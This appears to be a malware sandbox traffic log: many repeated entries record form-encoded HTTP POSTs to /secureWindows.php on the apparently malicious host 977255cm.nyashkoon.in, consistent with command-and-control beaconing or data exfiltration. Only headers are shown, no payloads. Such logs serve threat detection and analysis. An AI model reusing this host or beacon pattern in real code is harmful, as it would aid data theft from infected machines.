                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
